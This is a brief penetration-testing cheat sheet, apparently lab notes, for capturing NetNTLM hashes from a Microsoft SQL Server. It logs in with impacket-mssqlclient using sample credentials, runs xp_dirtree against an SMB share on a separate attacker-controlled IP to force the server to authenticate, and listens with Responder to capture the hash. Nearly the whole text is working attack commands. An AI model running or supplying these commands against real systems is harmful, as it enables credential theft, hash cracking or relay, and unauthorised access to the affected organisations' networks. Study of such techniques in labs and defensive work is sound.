MSSQL xp_dirtree Hash Capture

Connect to MSSQL

impacket-mssqlclient 'db_user':'Password123!'@192.168.116.158 -windows-auth

Enable advanced options and trigger SMB request

sp_configure 'show advanced options', 1
xp_dirtree \\192.168.45.181\share;

Capture the NetNTLM hash

sudo responder -I tun0 --verbose